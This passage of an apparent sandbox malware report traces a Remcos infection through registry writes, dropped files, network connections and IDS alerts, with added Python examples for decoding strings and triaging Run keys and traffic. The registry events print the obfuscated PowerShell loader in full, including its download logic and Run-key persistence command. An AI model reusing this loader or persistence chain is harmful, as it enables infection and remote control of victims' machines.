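"""Offline re-implementation of the 'every 4th character' string decoder
used by the PowerShell stage in this report.

Added example, not code from the report or from the malware.
"""

START = 3  # first payload character ($Hjtideligholdt143 = 3 in the script)
STEP = 4   # distance between payload characters (+= 4 in the script)


def decode(padded: str) -> str:
    """Mirror of the script's do/until loop: collect s[3], s[7], s[11], ...
    until the index runs off the end of the string."""
    return padded[START::STEP]


def check_alignment(padded: str) -> bool:
    """A clean operand has a length that is a multiple of 4, so the last
    group still carries a payload character. Anything else means the string
    was truncated or lost characters when it was copied out of a report."""
    return len(padded) % STEP == 0


# Operands copied from the command line of powershell.exe (PID 2384) above.
# PowerShell resolves type and cmdlet names case-insensitively, which is why
# the decoded text may have odd casing such as "NeT.WeBcLIEnt".
SAMPLES = {
    "class_1": "PalNI deReoT ed.UngW",                      # first half of a .NET type name
    "class_2": "EkseKnaBArsc UnLSmaIMicEPe,nK mt",          # second half, appended with +=
    "protocol": "Co,TPjklHe scen1 it2",                     # value assigned to SecurityProtocol
    "header": "C rULegS tueSrsrBl -PsyASymg haeBlnNToat",   # HTTP header name
    "ua_prefix": " SaMK mo tazStaimodlen lMitaSem/",        # start of the User-Agent value
    "separator": "pal>",                                    # delimiter used to split the URL list
    "alias": "spriTraETe.x",                                # cmdlet alias invoked by Chivalry
}


def decode_samples(samples=SAMPLES):
    """Decode each operand and report whether its length is 4-aligned."""
    return {name: (decode(s), check_alignment(s)) for name, s in samples.items()}


if __name__ == "__main__":
    for name, (plain, ok) in decode_samples().items():
        flag = "" if ok else "  <- length not a multiple of 4; copy may be damaged"
        print(f"{name:10s} {plain!r}{flag}")
```

Run the file to print each decoded operand; `decode` can be pointed at any other quoted argument of `Septuagenarianism` in the command lines above, including the `>`-separated URL list in `$Granulomatous`, as long as the string was copied intact.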
Total events
25 449
Read events
25 431
Write events
18
Delete events
0

Modification events

Process: (6028) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: ProxyBypass
Value: 1
Process: (6028) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: IntranetName
Value: 1
Process: (6028) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 1
Process: (6028) wscript.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: AutoDetect
Value: 0
Process: (5260) msiexec.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Civilbeskyttelsernes
Operation: write
Name: Bagsmkkerne
Value:
Get-ChildItem;Get-Service;$Decadic=(gcm A:).CommandType;$Decadic=[String]$Decadic;$Clamative='Saddelgjorde';$Decadic+=':';(n`i -p $Decadic -n Septuagenarianism -value { param ($Minimeringer);$Clamative='Polyunsaturate253';$Hjtideligholdt143=3;$Plumbate='Epicentre';do {$Fjernkendingerne+=$Minimeringer[$Hjtideligholdt143];$Hjtideligholdt143+=4} until(!$Minimeringer[$Hjtideligholdt143])$Fjernkendingerne});(n`i -p $Decadic -n Chivalry -value {param ($Disorganise);.($Wickerworked) ($Disorganise)});ConvertTo-Html;$Bagholdene=Septuagenarianism 'PalNI deReoT ed.UngW';$Bagholdene+=Septuagenarianism 'EkseKnaBArsc UnLSmaIMicEPe,nK mt';$Pebrine=Septuagenarianism ' SaMK mo tazStaimodlen lMitaSem/';$Skattedepartementerne=Septuagenarianism 'Co,TPjklHe scen1 it2';$Lynfryser='Nar[ RanDemeKo TNoe.Ants eEPror PavDomiRs.c ee.elP ,jOBesI atNbegtPolMSh a FeN,ruaEl.gA.tERhiRBiu]Bet:Los:FinSKemeOveCMe,U Kor PaIS lTHusYSp P Srr aiOHettGafO ac M oBlal tr= ug$KanSMulK T aSuitunsTNe e .ed oE PaPM naEphRRedTN.keVr.M NeE anN SiTS aeLayrLasn.onE';$Pebrine+=Septuagenarianism 'Com5 ko.Ci 0 Re Job(YenW imiRenn G d Goo H,wSvesUdv CidN urT S M t1Fil0Pos.Erh0 N.;bep ,uW G.iIndnMo 6Cle4Sk ; nh Syvx ,l6Tvr4Fna;Not NarrErovKom:Bev1Hap3.el7Jas. Op0 Un) E. 
Ov,GCr,eforc ZekGynokon/Oms2Fi 0fru1E.e0Pe.0 ,h1Ki,0,il1Ald KraF NeiPrirRe,eKrifAn,o orxuni/ Hy1Teg3Skr7Fab.Pel0';$Loaferish209=Septuagenarianism 'C rULegS tueSrsrBl -PsyASymg haeBlnNToat';$Granulomatous=Septuagenarianism ' OkhUndtRgftP opDogs ,o:Akt/Ne,/R.gmBrua ver ovtE tiHjon A sNo m HyaSoutNoieDyrr.atierdaPnepGenrOvei KimOrtaD,f.encc MaoLenmOc,.Ba,bSperM,s/ ypaK,fd Klm Gen .d/SerSGo nGruuTrabTr,nDu.eEucsSc s ule AgsSik.StihReahJorpB w> BahSoltRubtE ep.ous ep:Cir/ A /Pa.sFormHjecF rs arhForiObspEyepGeni Omn ragBoddUndlParhKarlRam.MuscMono Jem Sh/AlmSAnkn .yuP ob L n D ekals HesSpeeCe s Sk.Fugh uhPanp';$Pampsychist=Septuagenarianism 'pal>';$Wickerworked=Septuagenarianism 'spriTraETe.x';$Overjoyousness='Netforbundet';$Mischaracterize='\Blres.Smr';Chivalry (Septuagenarianism 'Cr.$ TjgKyslProoE tbSpyaAfsL.aa:Bior CiE ShGSekisp.nMilAMul9Fod2Hui= Wo$PikEKronPu.vToc:T.paCoupI.pPP eDFinamilTJi,ASti+G,e$PumMSpriLibSSalcrochCenAColRRygaBylcme,TMo,E CiRXaniSkaZ TeE');Chivalry (Septuagenarianism ' um$ SaGC,mLLunoHymb G aLiglUno:PriUBe,nRevd S eK mVI faph,sCroT S a S.TLreISilNGanGFacl .myUns=Pyl$Da G,rgrKina LoNRv,uNskLToloRaeMC aab nTPejOI,tUKasSSpe..opSp,lPArglFl IAl.t Co(Pa $Yi.pDi AFl.MHeap U,s.leY Tecukrh VeI ySPactHys)');Chivalry (Septuagenarianism $Lynfryser);$Granulomatous=$Undevastatingly[0];$foveation=(Septuagenarianism 'Pol$Epig ulYieOR ebWieA W LUko:c cV MaiIntsSteiCroT ElE.alRDeneP nTSkj=.asN cET rWNea- hioinaB KajAmaE ElCDratHa. DroSDelYNe snottSorE ,imdel. St$MamB pra baGP nhUnfOD sLkrodDe eLinN,rye');Chivalry ($foveation);Chivalry (Septuagenarianism 'U,d$ PoVUngilinsP siDi tGlaePrirMileTekt Be.LufHDagebssa ,idUnse V,rslasInf[ ro$ roL Tho M a EufCloeStjrNi iNdlsU fh Bo2 r0Ar,9A h]fo = P $BobPG nePenbG.drMiriEngn,nde');$Anetts=Septuagenarianism 'FilDP ao.arwDetn .elIn oVanaUnfdTraFCa iOpsl Pre';$Jewbird=Septuagenarianism ' Sm$ .eVFo.iG.tsunpiInttBioeAnlrPlueAtltsar.Phi$B sAPosn uteS rt A,t Ins Un. 
S IAlsnEp v hooEcdk.unePro( Ov$Ki GGigrBrnaMixnTouuUnplhikoMi mD maSkotAu oUdvu rosLa ,una$HypRGreeBurpAagrOpfoad dDgeuligc LotEksoAnnrSamyDov)';$Reproductory=$Regina92;Chivalry (Septuagenarianism ' a$Re GAnelF eoUniB ReAL.zlCat: VePSikeCo.r I NOp i eeT Jar SmIDeocUnd=Daw(UnrTSt.eConsOpstB d-TyrPS iaWe THomhJac tj$MesrSupEHelPpolrM do .dD fkupriCMadtBlyo UlRBray A.)');while (!$pernitric) {Chivalry (Septuagenarianism ' la$ BlgA olRado yebUroaGajlAlk:bidADelx Sketa mPr,e ThnD,v=.pr$ColROkaoMisoMermPuns') ;Chivalry $Jewbird;Chivalry (Septuagenarianism ' ma[UnaTSanh emrIn,e FlA rsD KuIPhoNUr.g Ot.IniTNoohUn r.areScoAS ld ra]Fre:Uig:A rsan.L L,eAlge OpPUbi(ham4Fej0Tig0 ra0.ar)');Chivalry (Septuagenarianism ' Op$Sjag ,uLsjlOBetbVu ABilLUn.:Womp Y.E Smr Pen leIDostFljr UnIScocBig= l(etpT .aEGreS hat Aw-Uk.pPo.aReht,elHSys Pul$ EpRCh EConpBairSeao GuD V UBilCO etCaiokvgR okY .e)') ;Chivalry (Septuagenarianism ' po$Ba.GAnoLYdeOFa bSkoa igLpez:A ahproVBraIC sd AgeprmrPennEngeLan=Pl $apnGCo,L JaoKitBBagaPe LNon:GabT.tieK lrDusRBeaOL wrM,lRTane ovg KnISpuMBe EUpcNS aTMiseBiotagn1Hie4 Co4B t+End+Beb%fra$ anu PrnTrndF.kepr,V HaaRets.retSilaKakt ReiN nNTidgF rLFlaY.bd.In CBaloHiruT,sn.avt') ;$Granulomatous=$Undevastatingly[$Hviderne]}$Cannonry=380548;$Forstaaelsesrammerne=30204;Chivalry (Septuagenarianism 'Usp$ vigK plGraO.akBSkuAHjeLGum:U,su UnNfdsIKorNPrifkileMorrW saSunBp klDefY Un tra=S.l FluG SoenootD a-IceC eoCobNRomT SwEm.gNUd,tNat Uni$,reRLs.E RaP var nvoFatDBrouTilcUncTAleOpleRSynY');Chivalry (Septuagenarianism ' S $ sygDeul FeoHjebOutaRunlU.p: elOU,tvStre.ilrShidStunSeag nte Nis Le syn=Bea La.[ FiS DeyCats S tBiteSkrm,ri.UnpC,oroHrenGnivMole emrRebtTun]For:Rab:TraFIntrOveo omBalBResaTmmsPe.e ,k6Maa4,elS Int alrTiliBevnAn gGi (Vin$Te UKapnStaiStyn VofSpae BlrMa,a HubInflFo yNi.)');Chivalry (Septuagenarianism 'Sel$LatGvveLTa.OIntB traBa LH l: TvHCrovBi iG orArvV rlEkse DeRSew ,o=Udl ul[ N s.crYaraSBa t IneT mM o. 
ElT ,eeHa X DotCor.Be eFirnSimcMaxoSkrd.riiSenNCabGPa,] S.:gri:Prea ApsAspc coiV nIJou.BaggSureAd.tV nSSolT.niRVa IGaln erG yr(int$P rOMusVAfrEMa,rCanD GoNBalgJocEH xs Ka)');Chivalry (Septuagenarianism 'F i$Jaig OplI eo .hbReba .clGl,:SupEsknkGuns DiTTrarSamaT nASnoRterBEveeRevJSvuDJibeL.ar ilnLepET rsNon2P,n4Bet9Une=Ste$Ka hObsv pI atrLasvDobldise anRTon.DehsLemuFreBTrfS.uatFlurS iiMe.NSamGGro(Pre$StrcAbiaSednMedn PaoLudN pRUdsy Ma,ni $UdrfFreO SuRarbS ,ttDifA RaADivEJ nl iaSReteUnas UnRAr alummSliMU oeS arBenN .dEswa)');Chivalry $Ekstraarbejdernes249;
Process: (5260) msiexec.exe
Key: HKEY_CURRENT_USER\Environment
Operation: write
Name: Tilbagebetaling37
Value: c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Process: (7012) reg.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation: write
Name: Pridingly
Value: %Tilbagebetaling37% -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';%Tilbagebetaling37% ($Trihedral)
Process: (5260) msiexec.exe
Key: HKEY_CURRENT_USER\SOFTWARE\samnetgtso-ZGKM98
Operation: write
Name: exepath
Value: 5EC8481008E163B3F65B0D2FAC69D480EDA67F188AD0FE0D4B488546F222B8B5283FD2EF44AE5CCB2C0E00F0F65471C36C9B3F755AF2AB60B92DA6F26DC9CE0B
Process: (5260) msiexec.exe
Key: HKEY_CURRENT_USER\SOFTWARE\samnetgtso-ZGKM98
Operation: write
Name: licence
Value: 10F2AFF966FEEDCC259D1F71DB59E1A9
Process: (5260) msiexec.exe
Key: HKEY_CURRENT_USER\SOFTWARE\samnetgtso-ZGKM98
Operation: write
Name: time
Value:
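
Persistence in this run is spread across three registry locations written by the Remcos-hosting msiexec.exe (PID 5260) and by reg.exe (PID 7012): the payload script in HKCU\SOFTWARE\Civilbeskyttelsernes\Bagsmkkerne, a user environment variable Tilbagebetaling37 in HKCU\Environment holding the path to the 32-bit powershell.exe, and a REG_EXPAND_SZ Run value Pridingly that references only %Tilbagebetaling37% (ATT&CK T1547.001). A hunt that searches Run values for "powershell" never sees the launcher: the variable has to be expanded against the same user's HKCU\Environment first, and clean-up has to remove all three values, not just the Run entry. The Python below is an added example, not part of the report: it triages exported Run entries the way a collection script would, using the two real values from the modification events above plus one constructed benign OneDrive entry for contrast (that path and flag are made up for the example).

```python
r"""Triage of Run-key autostart entries whose launcher hides behind a
user-defined environment variable.

Added example, not code from the report. Real values (Tilbagebetaling37,
Pridingly) come from the report's modification events; the OneDrive entry
is constructed.
"""
import re

# From the report: written by msiexec.exe (PID 5260) to HKCU\Environment.
USER_ENV = {"Tilbagebetaling37": r"c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"}

# (name, type, data) as dumped from HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
RUN_ENTRIES = [
    ("Pridingly", "REG_EXPAND_SZ",   # from the report, written by reg.exe (PID 7012)
     r"%Tilbagebetaling37% -windowstyle 2 $Trihedral=(g`p 'HKCU:\Software\Civilbeskyttelsernes\').'Bagsmkkerne';%Tilbagebetaling37% ($Trihedral)"),
    ("OneDrive", "REG_SZ",           # constructed benign entry for contrast
     r'"C:\Users\admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]

# Variables Windows defines itself; any other %VAR% in a Run value deserves a look.
SYSTEM_VARS = {"systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)",
               "programdata", "appdata", "localappdata", "userprofile", "temp", "tmp",
               "public", "comspec", "path", "commonprogramfiles", "homepath", "homedrive"}

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe"}

VAR_RE = re.compile(r"%([^%\s]+)%")
REG_READ_RE = re.compile(r"(?i)\b(?:g`?p|get-itemproperty)\b[^;]*HKCU:")  # payload fetched from the registry
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+(?:2|h(?:idden)?)\b")     # -windowstyle 2 / -w hidden
BACKTICK_RE = re.compile(r"\w`\w")                                          # g`p style token splitting


def expand_env(data: str, env: dict) -> str:
    """Expand %VAR% as the shell would, with case-insensitive names.
    Unknown variables are left untouched, which is also what Windows does."""
    lookup = {k.lower(): v for k, v in env.items()}
    return VAR_RE.sub(lambda m: lookup.get(m.group(1).lower(), m.group(0)), data)


def image_name(cmdline: str) -> str:
    """Lower-cased base name of the launched image, honouring a quoted path."""
    s = cmdline.strip()
    if not s:
        return ""
    if s.startswith('"'):
        end = s.find('"', 1)
        first = s[1:end] if end > 0 else s[1:]
    else:
        first = s.split()[0]
    return re.split(r"[\\/]", first)[-1].lower()


def triage_run_entry(name: str, vtype: str, data: str, env: dict) -> list:
    """Return the indicator tags that fire for one Run entry."""
    tags = []
    user_vars = [v for v in VAR_RE.findall(data) if v.lower() not in SYSTEM_VARS]
    if vtype == "REG_EXPAND_SZ" and user_vars:
        tags.append("expand_sz_user_var")
    expanded = expand_env(data, env)          # the raw value alone never names the launcher
    if image_name(expanded) in SCRIPT_HOSTS:
        tags.append("script_host_launcher")
    if REG_READ_RE.search(expanded):
        tags.append("payload_read_from_registry")
    if HIDDEN_RE.search(expanded):
        tags.append("hidden_window")
    if BACKTICK_RE.search(expanded):
        tags.append("backtick_split_cmdlet")
    return tags


def triage_all(entries=RUN_ENTRIES, env=USER_ENV) -> dict:
    return {name: triage_run_entry(name, vtype, data, env) for name, vtype, data in entries}


if __name__ == "__main__":
    for name, tags in triage_all().items():
        print(f"{name}: {tags or 'clean'}")
```

On a live host the two inputs would come from exporting HKCU\Environment and the per-user Run key for every loaded profile; the expansion step is the one most collection scripts skip, and it is exactly what this sample relies on.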
Executable files
0
Suspicious files
6
Text files
9
Unknown types
0

Dropped files

Each entry lists PID, Process, Filename and Type, followed by MD5 and SHA256.
PID: 2384
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5:C319A4E97C0E1A13188242197B7D90C7
SHA256:06B55A473E1A80B8F881F3941B637648B3BD02884926B5CE15EA22FC75FD4A77
5260msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751binary
MD5:E192462F281446B5D1500D474FBACC4B
SHA256:F1BA9F1B63C447682EBF9DE956D0DA2A027B1B779ABEF9522D347D3479139A60
4976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_baoevh11.hm1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kcu0njrb.ueb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3888powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ktrwsnqv.uar.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3888powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
4976powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_snl3o1r0.4wk.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5260msiexec.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751binary
MD5:5CE75284941856F796246F5AC9AD2654
SHA256:3F1D65E58756FB57615D14A33506B37CD17544D4EDB913003B379814F14C2F7D
5260msiexec.exeC:\Users\admin\AppData\Roaming\lausonspt.datbinary
MD5:CEF3190D2CC35103A03CBB7C0644F87E
SHA256:2FD7685F418C6ED052D4B4F8D0B5E0888FF1BE5B98C1144C076D3DA1C376615A
5260msiexec.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:67E0D0DB93D7A6C2E59C1AB5B0243B66
SHA256:882565B0B72D3EF8BC5A291A0D6724637B05FDAE81D981066737139B9049A589
HTTP(S) requests: 8
TCP/UDP connections: 28
DNS requests: 20
Threats: 4

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
- | - | GET | 200 | 23.216.77.18:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
- | - | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
6112 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
5260 | msiexec.exe | GET | 200 | 2.19.105.127:80 | http://x1.c.lencr.org/ | unknown | whitelisted
6112 | SIHClient.exe | GET | 200 | 2.23.246.101:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
5260 | msiexec.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2104 | svchost.exe | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 23.216.77.18:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
- | - | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
2112 | svchost.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
2384 | powershell.exe | 177.53.143.68:443 | martinsmateriaprima.com.br | Brasil Site Informatica LTDA | BR | unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 4.231.128.59
  • 51.104.136.2
whitelisted
google.com
  • 142.250.185.78
whitelisted
crl.microsoft.com
  • 23.216.77.18
  • 23.216.77.41
  • 23.216.77.25
  • 23.216.77.35
  • 23.216.77.26
  • 23.216.77.28
  • 23.216.77.30
  • 23.216.77.13
  • 23.216.77.29
whitelisted
www.microsoft.com
  • 23.35.229.160
  • 2.23.246.101
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
martinsmateriaprima.com.br
  • 177.53.143.68
unknown
login.live.com
  • 40.126.32.138
  • 40.126.32.133
  • 20.190.160.65
  • 40.126.32.76
  • 20.190.160.130
  • 20.190.160.131
  • 20.190.160.64
  • 20.190.160.22
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 20.109.210.53
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 13.85.23.206
whitelisted

Threats

PID | Process | Class | Message
2196 | svchost.exe | Potentially Bad Traffic | ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain
2196 | svchost.exe | Misc activity | ET DYN_DNS DYNAMIC_DNS Query to *.duckdns. Domain
5260 | msiexec.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response
5260 | msiexec.exe | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Checkin
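Read together, the HTTP, Connections and Threats tables tell the network side of the story: powershell.exe (PID 2384) is the only process talking to a destination with unknown reputation (martinsmateriaprima.com.br, the stage the verdict calls "Script downloads file"), msiexec.exe (PID 5260) fetches http://geoplugin.net/json.gp, which is a benign and whitelisted service but one that an MSI installer has no reason to query, and Suricata names the family on the same PID. The *.duckdns.org query is attributed to svchost.exe only because the Windows DNS Client service resolves names for every process, so the IDS row alone cannot say who asked. The following is an added example, not ANY.RUN's or the sample's code, that applies those three judgements to rows constructed from the tables above; the row dictionaries, rule names and the SCRIPT_HOSTS and GEO_SERVICES tuning lists are the example's own assumptions.

```python
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Rows constructed from the HTTP requests, Connections and Threats tables of this
# report (a representative subset). pid=None marks rows listed without a process.
HTTP_ROWS = [
    {"pid": None, "process": None, "reputation": "whitelisted",
     "url": "http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl"},
    {"pid": 5496, "process": "MoUsoCoreWorker.exe", "reputation": "whitelisted",
     "url": "http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl"},
    {"pid": 5260, "process": "msiexec.exe", "reputation": "whitelisted",
     "url": "http://x1.c.lencr.org/"},
    {"pid": 5260, "process": "msiexec.exe", "reputation": "whitelisted",
     "url": "http://geoplugin.net/json.gp"},
]
CONN_ROWS = [
    {"pid": 2104, "process": "svchost.exe", "dst": "20.73.194.208:443",
     "domain": "settings-win.data.microsoft.com", "reputation": "whitelisted"},
    {"pid": 2384, "process": "powershell.exe", "dst": "177.53.143.68:443",
     "domain": "martinsmateriaprima.com.br", "reputation": "unknown"},
]
THREATS = [
    {"pid": 2196, "process": "svchost.exe", "cls": "Potentially Bad Traffic",
     "msg": "ET DYN_DNS DYNAMIC_DNS Query to a *.duckdns .org Domain"},
    {"pid": 5260, "process": "msiexec.exe",
     "cls": "Malware Command and Control Activity Detected",
     "msg": "ET MALWARE Remcos 3.x Unencrypted Server Response"},
    {"pid": 5260, "process": "msiexec.exe",
     "cls": "Malware Command and Control Activity Detected",
     "msg": "ET MALWARE Remcos 3.x Unencrypted Checkin"},
]

# Tuning lists assumed for this example, not taken from the report.
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
GEO_SERVICES = {"geoplugin.net", "ip-api.com", "ipinfo.io", "api.ipify.org"}
_FAMILY = re.compile(r"\bET MALWARE ([A-Za-z0-9]+)")
_DDNS = re.compile(r"DYN_DNS|DYNAMIC_DNS|duckdns", re.I)


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def triage(http_rows, conn_rows, threats) -> List[dict]:
    findings: List[dict] = []
    # 1. A scripting host reaching a destination nobody vouches for: the
    #    download stage. Reputation "unknown" is enough; no whitelist applies.
    for r in conn_rows:
        if r["process"] in SCRIPT_HOSTS and r["reputation"] != "whitelisted":
            findings.append({"rule": "script_host_external_connection", "pid": r["pid"],
                             "process": r["process"], "domain": r["domain"],
                             "dst": r["dst"]})
    # 2. Geolocation lookups: the service is benign, the caller is what matters.
    hosts_by_pid: Dict[int, List[str]] = {}
    for r in http_rows:
        h = host_of(r["url"])
        if r["pid"] is not None:
            hosts_by_pid.setdefault(r["pid"], []).append(h)
        if h in GEO_SERVICES:
            findings.append({"rule": "geolocation_lookup", "pid": r["pid"],
                             "process": r["process"], "host": h})
    # 3. IDS hits: extract the family from the ET message and flag dynamic DNS.
    #    The DNS row carries svchost.exe because the DNS Client service resolves
    #    on behalf of every process, so it is kept as a separate finding rather
    #    than attributed to the C2 process.
    families: Dict[int, set] = {}
    for t in threats:
        m = _FAMILY.search(t["msg"])
        if m:
            families.setdefault(t["pid"], set()).add(m.group(1))
        if _DDNS.search(t["msg"]):
            findings.append({"rule": "dynamic_dns_query", "pid": t["pid"],
                             "process": t["process"], "msg": t["msg"]})
    # 4. Join: one profile per (process, family) with that process's HTTP hosts.
    for pid, fams in families.items():
        for fam in sorted(fams):
            findings.append({"rule": "c2_process_profile", "pid": pid, "family": fam,
                             "hosts": sorted(set(hosts_by_pid.get(pid, [])))})
    return findings


if __name__ == "__main__":
    for finding in triage(HTTP_ROWS, CONN_ROWS, THREATS):
        print(finding)
```

The CRL and OCSP rows produce nothing, which is the point of keying rule 1 on the requesting process and rule 2 on the destination rather than on reputation alone; on a real host the same join can be driven from Sysmon EventID 3 (network connection) and EventID 22 (DNS query), the latter of which does record the querying process.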
No debug info